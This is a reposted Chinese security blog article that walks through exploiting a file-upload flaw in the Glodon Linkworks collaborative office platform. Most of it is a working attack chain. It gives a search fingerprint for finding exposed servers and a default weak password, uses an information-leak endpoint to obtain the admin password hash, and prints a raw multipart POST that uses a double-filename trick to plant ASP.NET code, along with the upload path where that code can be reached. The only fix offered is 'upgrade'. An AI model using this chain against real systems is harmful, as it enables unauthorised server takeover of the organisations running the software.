广联达-Linkworks 协同办公管理平台存在文件上传漏洞

admin
admin
admin
138858
文章
114
评论
2024年7月15日17:00:50评论94 views字数 835阅读2分47秒阅读模式
01漏洞描述

      在利用信息泄露漏洞或默认弱口令admin/password登陆系统后,在msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞,攻击者获取管理员信息后,可以登陆发送请求包获取服务器权限。
02—系统指纹

鹰图:web.body="/Services/Identification/Server/"

03—产品主页

广联达-Linkworks 协同办公管理平台存在文件上传漏洞

04—漏洞复现

      总体思路:使用信息泄露漏洞获取管理员账号密码后登陆系统,利用获取到的Cookie进行文件上传漏洞验证。

利用信息泄露漏洞/Org/service/Service.asmx/GetUserXml4GEPS
广联达-Linkworks 协同办公管理平台存在文件上传漏洞

对获取到的管理员密码MD5值进行解码

广联达-Linkworks 协同办公管理平台存在文件上传漏洞

账号admin

密码Admin123

登陆系统获取Cookie

广联达-Linkworks 协同办公管理平台存在文件上传漏洞

利用获取到的cookie进行文件上传漏洞验证

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjCookie: 登录后获取的Cookie------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1.jpg"Content-Type: application/text<%Response.Write("Hello, Word!")%>------WebKitFormBoundaryFfJZ4PlAZBixjELj--

广联达-Linkworks 协同办公管理平台存在文件上传漏洞

访问地址   /gtp/im/services/group/upload/

广联达-Linkworks 协同办公管理平台存在文件上传漏洞

05—修复建议

升级系统版本

 

原文始发于微信公众号(如棠安全):【0day漏洞复现】广联达-Linkworks 协同办公管理平台存在文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日17:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   广联达-Linkworks 协同办公管理平台存在文件上传漏洞https://cn-sec.com/archives/2781515.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息